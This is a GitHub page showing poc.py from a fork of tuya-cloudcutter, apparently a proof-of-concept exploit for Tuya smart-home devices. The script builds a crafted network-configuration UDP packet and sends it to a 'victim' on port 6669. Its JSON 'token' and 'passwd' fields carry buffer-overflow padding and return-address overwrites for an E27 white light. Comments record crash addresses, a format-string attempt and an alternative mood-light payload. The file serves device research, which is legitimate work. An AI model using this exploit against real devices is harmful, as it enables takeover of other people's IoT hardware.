forked from tuya-cloudcutter/tuya-cloudcutter
-
Notifications
You must be signed in to change notification settings - Fork 0
/
poc.py
80 lines (68 loc) · 2.79 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
import struct
import zlib
import socket
MAX_CONFIG_PACKET_PAYLOAD_LEN = 0xE8
VICTIM_IP = '192.168.175.1'
VICTIM_PORT = 6669
def build_network_config_packet(payload):
if len(payload) > MAX_CONFIG_PACKET_PAYLOAD_LEN:
raise ValueError('Payload is too long!')
# NOTE
# fr_num and crc do not seem to be used in the disas
# calculating them anyway - in case it's needed
# for some reason.
tail_len = 8
head, tail = 0x55aa, 0xaa55
fr_num, fr_type = 0, 0x1
plen = len(payload) + tail_len
buffer = struct.pack("!IIII", head, fr_num, fr_type, plen)
buffer += payload
crc = zlib.crc32(buffer)
buffer += struct.pack("!II", crc, tail)
return buffer
def send_network_config_datagram(datagram):
client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
client.sendto(datagram, (VICTIM_IP, VICTIM_PORT))
def encode_json_val(value):
encoded = []
escaped = list(map(ord, '"\\'))
escape_char = ord('\\')
for i in value:
if i in escaped:
encoded.append(escape_char)
encoded.append(i)
return bytes(encoded)
def check_valid_payload(value):
eq_zero = lambda x: x == 0
if any(map(eq_zero, value)):
print('[!] At least one null byte detected in payload. Clobbering will stop before that.')
return value
# TODO: Get original R3 (finish_cb) value = 0x00097D47 - in ARM THUMB mode
# 0x00097D34 can be used to leak info since it crashes at the callsite?
# 0x43, 0x45, 0x47 or 0x49!
# 0x5b also works?!
# 0x5b, 0x5d, 0x5f, 0x63, 0x65, 0x69, 0x6b also work
# 0x6d, 0x6f, 0x71 causes an error with SysMalloc failed size: 0x4228c0 (r0?)
# what if we do some shellcoding in r0?
# \x71\x2D\x42
# 422d70
# 0041F490
# 000a0ecc
# addr_overwrite_val = b'\xcd\x0e\x0a'
# padding = b'A' * 72
# token = encode_json_val(padding + addr_overwrite_val)
#
# ssid = encode_json_val(b'%p%n')
# password = encode_json_val(b'PASSWD_HAX_STUFF')
#
# payload = b'{"ssid":"' + ssid
# payload += b'","passwd":"' + password
# payload += b'","token":"' + token
# payload += b'"}'
# MOOD LIGHT
#payload = b'{"auzkey":"AAAAAAAAAAAAAAAA","uuid":"abcd","pskKey":"","prod_test":false,"ap_ssid":"A","ssid":"A","token":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x57\x11\x03","passwd":"AAAAAAAAAAAAAAAAAAAA\xa1\x74\x0d"}'
# E27 WHITE LIGHT PAYLOAD
payload = b'{"auzkey":"AAAAAAAAAAAAAAAA","uuid":"abcd","pskKey":"","prod_test":false,"ap_ssid":"A","ssid":"A","token":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xb9\x94\x0b","passwd":"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x15\xd5\x0a"}'
payload = check_valid_payload(payload)
datagram = build_network_config_packet(payload=payload)
send_network_config_datagram(datagram=datagram)